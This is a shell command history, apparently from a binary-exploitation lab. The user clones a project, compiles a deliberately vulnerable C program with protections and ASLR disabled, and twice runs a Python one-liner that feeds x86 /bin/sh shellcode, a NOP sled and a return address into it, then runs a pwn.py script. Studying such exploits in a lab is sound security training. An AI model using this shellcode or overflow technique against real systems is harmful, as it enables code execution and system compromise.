    1  sudo apt install build-essential dkms linux-headers-$(uname -r)
    2  sudo apt-get update
    3  sudo apt-get install build-essential
    4  sudo apt install build-essential dkms
    5  ls
    6  mkdir BSO
    7  cd BSO
    8  git init
    9  sudo apt install git
   10  git init
   11  git clone https://github.com/ahermani/BSO-Project.git
   12  ls
   13  sudo apt get update
   14  sudo apt-get update
   15  cd BSO/
   16  ls
   17  cd BSO-Project/
   18  ls
   19  cd nx
   20  ls
   21  cat vuln.c
   22  vim vuln.c
   23  sudo-apt install vim
   24  sudo apt install vim
   25  sudo apt-get upgrade
   26  sudo apt install vim
   27  sudo apt install python3
   28  sudo apt install python
   29  sudo apt install pip3
   30  sudo apt install peda
   31  cd BSO/
   32  cd BSO-Project/
   33  cd nx
   34  cat vuln.c
   35  vim vuln.v
   36  rm vuln.v
   37  vim vuln.c
   38  cd .
   39  cd ..
   40  git pull
   41  cd ..
   42  git init
   43  git clone
   44  git clone https://github.com/ahermani/BSO-Project.git
   45  ls
   46  cd BSO-Project/
   47  ls
   48  cd nx
   49  cat vuln.c
   50  echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
   51  gcc vuln.c -oout -fno-stack-protector -fno-pie -no-pie -z execstack 
   52  gdb ./out
   53  ulimit -c unlimited
   54  gdb ./out
   55  (python -c 'shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; print "\x90"*(52 - len(shellcode)) + shellcode + "\x90"*40  + "\xcc\xee\xff\xbf"*10';cat) | ./out
   56  objdump -d ./out
   57  gdb ./out
   58  ls
   59  cat .gdinit
   60  cat .gdbinit
   61  cd
   62  cd BSO-Project/
   63  ls
   64  cat .gdbinit
   65  gdb ./out
   66  cd nx
   67  gdb ./out
   68  show disable-randomization
   69  sudo apt-install nmh
   70  sudo apt install nmh
   71  show disable-randomization
   72  set exec-wrapper env-u LINES -u COLUMNS
   73  (python -c 'shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; print "\x90"*(52 - len(shellcode)) + shellcode + "\x90"*40  + "\xcc\xee\xff\xbf"*10';cat) | ./out
   74  cat ./pwn.py | ./out
   75  python3 pwn.py ./out
   76  python3 pwn.py
   77  apt-get update
   78  apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
   79  history >210416.txt
